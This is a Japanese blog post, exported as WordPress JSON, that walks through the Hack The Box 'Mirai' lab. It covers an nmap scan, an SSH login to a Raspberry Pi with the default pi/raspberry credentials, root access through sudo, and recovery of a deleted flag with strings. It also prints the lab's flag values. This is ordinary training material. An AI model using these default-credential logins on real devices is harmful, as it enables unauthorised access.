{"id":3731,"date":"2020-08-15T19:42:17","date_gmt":"2020-08-15T10:42:17","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3731"},"modified":"2020-08-30T23:33:40","modified_gmt":"2020-08-30T14:33:40","slug":"hack-the-box-mirai-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3731","title":{"rendered":"Hack The Box – Mirai – Walkthrough"},"content":{"rendered":"

80\u756a\u30dd\u30fc\u30c8\u304c\u30a2\u30af\u30bb\u30b9\u53ef\u80fd<\/h3>\n
\r\n# nmap -A -n -F -T5 mirai.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-15 07:33 UTC\r\nNmap scan report for mirai.htb (10.10.10.48)\r\nHost is up (0.047s latency).\r\nNot shown: 80 filtered ports\r\nPORT      STATE  SERVICE         VERSION\r\n22\/tcp    open   ssh             OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)\r\n|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)\r\n|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)\r\n|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)\r\n23\/tcp    closed telnet\r\n25\/tcp    closed smtp\r\n53\/tcp    open   domain          dnsmasq 2.76\r\n| dns-nsid:\r\n|_  bind.version: dnsmasq-2.76\r\n80\/tcp    open   http            lighttpd 1.4.35\r\n|_http-server-header: lighttpd\/1.4.35\r\n|_http-title: Website Blocked\r\n111\/tcp   closed rpcbind\r\n113\/tcp   closed ident\r\n443\/tcp   closed https\r\n445\/tcp   closed microsoft-ds\r\n993\/tcp   closed imaps\r\n995\/tcp   closed pop3s\r\n1025\/tcp  closed NFS-or-IIS\r\n3986\/tcp  closed mapper-ws_ethd\r\n5060\/tcp  closed sip\r\n5631\/tcp  closed pcanywheredata\r\n8009\/tcp  closed ajp13\r\n8081\/tcp  closed blackice-icecap\r\n8888\/tcp  closed sun-answerbook\r\n32768\/tcp closed filenet-tms\r\n49152\/tcp closed unknown\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\r\n<\/pre>\n
\u30e9\u30ba\u30d9\u30ea\u30fc\u30d1\u30a4\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u30e6\u30fc\u30b6\u3067\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u307f\u308b<\/h3>\n
\"\"<\/a>
\nPi-hole v3.1.4 \u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3002\u5e83\u544a\u3092\u30d6\u30ed\u30c3\u30af\u3059\u308bDNS\u3092\u52d5\u4f5c\u3055\u305b\u308b\u30d7\u30ed\u30b0\u30e9\u30e0\u3089\u3057\u3044\u3002
\n\u305d\u3057\u3066\u30e9\u30ba\u30d9\u30ea\u30fc\u30d1\u30a4\u3067\u69cb\u7bc9\u3059\u308b\u3053\u3068\u304c\u3088\u304f\u3042\u308b\u3089\u3057\u3044\u3002\u30c7\u30d5\u30a9\u30eb\u30c8ID\u3067SSH\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u305f\u3002
\nusername:pi
\npassword:raspberry<\/p>\n
\r\n# ssh pi@mirai.htb\r\nThe authenticity of host 'mirai.htb (10.10.10.48)' can't be established.\r\nECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY\/cVIx\/oXtiqLPXiXMY.\r\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\r\nWarning: Permanently added 'mirai.htb,10.10.10.48' (ECDSA) to the list of known hosts.\r\npi@mirai.htb's password:\r\nPermission denied, please try again.\r\npi@mirai.htb's password:\r\n\r\nThe programs included with the Debian GNU\/Linux system are free software;\r\nthe exact distribution terms for each program are described in the\r\nindividual files in \/usr\/share\/doc\/*\/copyright.\r\n\r\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\npermitted by applicable law.\r\nLast login: Sun Aug 27 14:47:50 2017 from localhost\r\n\r\nSSH is enabled and the default password for the 'pi' user has not been changed.\r\nThis is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.\r\n\r\npi@raspberrypi:~ $ sudo -l\r\nMatching Defaults entries for pi on localhost:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\r\n\r\nUser pi may run the following commands on localhost:\r\n    (ALL : ALL) ALL\r\n    (ALL) NOPASSWD: ALL\r\n\r\npi@raspberrypi:~ $ sudo su\r\n\r\n# cat Desktop\/user.txt\r\nff837707441b257a20e32199d7c8838d\r\n<\/pre>\n
root.txt\u3092\u78ba\u8a8d\u3059\u308b<\/h2>\n
\r\n# cat \/root\/root.txt\r\nI lost my original root.txt! I think I may have a backup on my USB stick...\r\n\r\n# df -h\r\nFilesystem      Size  Used Avail Use% Mounted on\r\naufs            8.5G  2.8G  5.3G  34% \/\r\ntmpfs           100M  4.8M   96M   5% \/run\r\n\/dev\/sda1       1.3G  1.3G     0 100% \/lib\/live\/mount\/persistence\/sda1\r\n\/dev\/loop0      1.3G  1.3G     0 100% \/lib\/live\/mount\/rootfs\/filesystem.squashfs\r\ntmpfs           250M     0  250M   0% \/lib\/live\/mount\/overlay\r\n\/dev\/sda2       8.5G  2.8G  5.3G  34% \/lib\/live\/mount\/persistence\/sda2\r\ndevtmpfs         10M     0   10M   0% \/dev\r\ntmpfs           250M  8.0K  250M   1% \/dev\/shm\r\ntmpfs           5.0M  4.0K  5.0M   1% \/run\/lock\r\ntmpfs           250M     0  250M   0% \/sys\/fs\/cgroup\r\ntmpfs           250M  8.0K  250M   1% \/tmp\r\n\/dev\/sdb        8.7M   93K  7.9M   2% \/media\/usbstick\r\ntmpfs            50M     0   50M   0% \/run\/user\/999\r\ntmpfs            50M     0   50M   0% \/run\/user\/1000\r\n\r\n# cat \/media\/usbstick\/damnit.txt\r\nDamnit! Sorry man I accidentally deleted your files off the USB stick.\r\nDo you know if there is any way to get them back?\r\n\r\n-James\r\n\r\n# strings \/dev\/sdb\r\n>r &\r\n\/media\/usbstick\r\nlost+found\r\nroot.txt\r\ndamnit.txt\r\n>r &\r\n>r &\r\n\/media\/usbstick\r\nlost+found\r\nroot.txt\r\ndamnit.txt\r\n>r &\r\n\/media\/usbstick\r\n2]8^\r\nlost+found\r\nroot.txt\r\ndamnit.txt\r\n>r &\r\n3d3e483143ff12ec505d026fa13e020b\r\nDamnit! Sorry man I accidentally deleted your files off the USB stick.\r\nDo you know if there is any way to get them back?\r\n-James\r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
80\u756a\u30dd\u30fc\u30c8\u304c\u30a2\u30af\u30bb\u30b9\u53ef\u80fd # nmap -A -n -F -T5 mirai.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-15 07:33 UTC Nm […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3731"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3731"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3731\/revisions"}],"predecessor-version":[{"id":3785,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3731\/revisions\/3785"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3731"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3731"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3731"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}